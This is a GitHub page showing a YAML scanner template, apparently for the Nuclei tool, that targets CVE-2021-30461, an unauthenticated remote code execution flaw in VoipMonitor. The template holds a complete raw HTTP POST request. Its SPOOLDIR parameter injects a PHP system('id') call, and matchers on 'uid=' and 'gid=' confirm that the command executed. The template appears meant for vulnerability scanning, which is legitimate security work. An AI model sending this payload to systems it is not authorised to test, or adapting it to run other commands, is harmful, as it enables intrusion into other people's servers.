-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathVOIPrce.yaml
38 lines (33 loc) · 1012 Bytes
/
VOIPrce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2021-30461
info:
name: VoipMonitor Pre-Auth-RCE
author: nithissh
severity: critical
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
SPOOLDIR=test".system(id)."&recheck=Recheck
matchers-condition: and
matchers:
- type: word
words:
- "uid="
- "gid="
- "groups="
- "VoIPmonitor installation"
part: body
condition: and
- type: status
status:
- 200